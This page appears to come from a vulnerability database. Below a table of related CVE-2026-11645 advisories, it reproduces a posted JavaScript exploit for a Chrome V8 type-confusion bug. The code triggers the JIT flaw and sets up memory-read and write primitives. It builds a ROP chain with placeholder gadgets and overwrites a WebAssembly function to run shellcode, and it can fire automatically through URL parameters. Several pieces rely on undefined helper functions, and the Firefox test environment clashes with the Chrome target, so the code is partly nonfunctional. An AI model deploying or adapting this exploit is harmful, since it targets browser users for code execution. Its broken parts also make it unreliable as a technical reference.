| Reporter | Title | Published | Views | Family All 221 |
|---|---|---|---|---|
| Exploit for Out-of-bounds Read in Google Chrome | 10 Jun 202623:06 | โ | githubexploit | |
| Exploit for Out-of-bounds Read in Google Chrome | 10 Jun 202615:02 | โ | githubexploit | |
| CVE-2026-11645 | 8 Jun 202623:27 | โ | attackerkb | |
| CVE-2026-11645 | 8 Jun 202623:27 | โ | alpinelinux | |
| June Linux Patch Wednesday | 26 Jun 202617:00 | โ | avleonov | |
| The vulnerability of the JavaScript script handler in Google Chromeโs V8 engine allows attackers to execute arbitrary code. | 10 Jun 202600:00 | โ | bdu_fstec | |
| CVE-2026-11645 vulnerabilities | 10 Jun 202601:17 | โ | cgr | |
| CVE-2026-11645 | 8 Jun 202618:00 | โ | circl | |
| Google Chromium V8 Out-of-Bounds Read and Write Vulnerability | 9 Jun 202600:00 | โ | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 9 Jun 202612:00 | โ | cisa |
==================================================================================================================================
| # Title : Google Chrome V8 Type Confusion Exploit Payload met Memory Primitives |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://chromereleases.googleblog.com |
==================================================================================================================================
[+] Summary : This JavaScript exploit targets a type confusion vulnerability in the V8 engine of Google Chrome (versions prior to 149.0.7827.103).
It runs inside the browser and attempts to trigger a JIT optimization flaw using repeated object construction patterns.
[+] POC :
(function() {
'use strict';
const CONFIG = {
TRAINING_ITERATIONS: 800,
TRIGGER_ITERATIONS: 1500,
STRONG_TRIGGER_COUNT: 5,
STRESS_CYCLES: 8,
STRESS_DELAY_MS: 700
};
function log(msg, type = 'info') {
const statusEl = document.getElementById('status') || document.body;
const colors = {
info: '#00ccff',
success: '#00ff88',
warning: '#ffaa00',
error: '#ff4444'
};
const timestamp = new Date().toLocaleTimeString();
const logLine = `[${timestamp}] ${msg}`;
if (statusEl) {
const p = document.createElement('div');
p.style.color = colors[type] || colors.info;
p.textContent = logLine;
statusEl.appendChild(p);
}
console.log(logLine);
}
function triggerTypeConfusion() {
try {
let value = 2;
class C extends Function {
['AA'] = value;
}
for (let i = 0; i < CONFIG.TRAINING_ITERATIONS; i++) {
new C("'use strict'");
}
value = 1.1;
for (let i = 0; i < CONFIG.TRIGGER_ITERATIONS; i++) {
new C("'use strict'");
}
return true;
} catch (e) {
log(`Trigger error: ${e.message}`, 'error');
return false;
}
}
function strongTrigger() {
let success = false;
for (let i = 0; i < CONFIG.STRONG_TRIGGER_COUNT; i++) {
log(`Strong trigger run ${i + 1}/${CONFIG.STRONG_TRIGGER_COUNT}...`);
if (triggerTypeConfusion()) {
success = true;
log(`Trigger ${i + 1} successful`, 'success');
}
}
return success;
}
function addrof(obj) {
if (typeof window._addrof === 'function') {
return window._addrof(obj);
}
return null;
}
function fakeobj(addr) {
if (typeof window._fakeobj === 'function') {
return window._fakeobj(addr);
}
return null;
}
function readMemory(addr, size) {
if (typeof window._read === 'function') {
return window._read(addr, size);
}
return null;
}
function writeMemory(addr, data) {
if (typeof window._write === 'function') {
return window._write(addr, data);
}
return false;
}
function setupPrimitives() {
log("Setting up memory primitives...");
try {
const ab = new ArrayBuffer(0x1000);
const dv = new DataView(ab);
if (typeof window.corruptBackingStore === 'function') {
window.corruptBackingStore(dv);
return {
dataView: dv,
read: (addr, size) => {
return readMemory(addr, size);
},
write: (addr, data) => {
return writeMemory(addr, data);
}
};
}
} catch (e) {
log(`Failed to setup primitives: ${e}`, 'error');
}
return null;
}
function findChromeBase() {
const dummy = {};
const addr = addrof(dummy);
if (addr) {
log(`Found object address: 0x${addr.toString(16)}`);
const base = addr & ~0xFFFFFFFF;
log(`Chrome base candidate: 0x${base.toString(16)}`);
return base;
}
return null;
}
function buildROPChain(shellcodeAddr) {
const gadgets = {
pop_rax: 0x414141414141,
pop_rcx: 0x424242424242,
pop_rdx: 0x434343434343,
pop_rsi: 0x444444444444,
pop_rdi: 0x454545454545,
syscall: 0x464646464646,
virtual_protect: 0x474747474747
};
const chain = [
gadgets.pop_rax, 0x50,
gadgets.pop_rcx, shellcodeAddr,
gadgets.pop_rdx, 0x1000,
gadgets.pop_rsi, 0x40,
gadgets.pop_rdi, 0,
gadgets.syscall
];
return new Uint8Array(new Uint32Array(chain).buffer);
}
function executeShellcode(shellcode) {
log("Attempting to execute shellcode...");
try {
const wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,4,1,96,0,0,3,2,1,0,10,4,1,0,11]);
const wasmModule = new WebAssembly.Module(wasmCode);
const wasmInstance = new WebAssembly.Instance(wasmModule, {});
const wasmFunc = wasmInstance.exports.main;
// Overwrite wasm function with shellcode
const funcAddr = addrof(wasmFunc);
if (funcAddr) {
writeMemory(funcAddr + 0x10, shellcode);
wasmFunc();
log("Shellcode executed!", "success");
return true;
}
} catch (e) {
log(`Shellcode execution failed: ${e}`, 'error');
}
return false;
}
async function exploit() {
log("Starting CVE-2026-11645 exploit...");
log(`Target: Chrome < 149.0.7827.103`);
const ua = navigator.userAgent;
const chromeMatch = ua.match(/Chrome\/(\d+)/);
if (chromeMatch) {
const version = parseInt(chromeMatch[1]);
log(`Detected Chrome version: ${version}`);
if (version >= 149) {
log("Browser appears patched", "warning");
} else {
log("Browser appears vulnerable", "success");
}
}
log("Triggering type confusion...");
if (!strongTrigger()) {
log("Failed to trigger type confusion", "error");
return false;
}
log("Type confusion triggered successfully!", "success");
const primitives = setupPrimitives();
if (!primitives) {
log("Failed to setup memory primitives", "error");
return false;
}
log("Memory primitives ready", "success");
const chromeBase = findChromeBase();
if (!chromeBase) {
log("Failed to find Chrome base", "warning");
}
log("Ready for payload execution");
return true;
}
function autoStressTest() {
log(`Starting auto stress test (${CONFIG.STRESS_CYCLES} cycles)...`);
let cycleCount = 0;
const interval = setInterval(() => {
cycleCount++;
log(`Stress cycle ${cycleCount}/${CONFIG.STRESS_CYCLES}`);
exploit();
if (cycleCount >= CONFIG.STRESS_CYCLES) {
clearInterval(interval);
log("Auto stress test completed");
}
}, CONFIG.STRESS_DELAY_MS);
return interval;
}
window.CVE_2026_11645 = {
exploit,
autoStressTest,
trigger: triggerTypeConfusion,
strongTrigger
};
if (window.location.search.includes('auto=true')) {
setTimeout(() => autoStressTest(), 1000);
} else if (window.location.search.includes('exploit=true')) {
setTimeout(() => exploit(), 1000);
} else {
log("CVE-2026-11645 Exploit Ready", "success");
log("Use ?auto=true for auto-stress or ?exploit=true for single exploit", "info");
}
})();
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation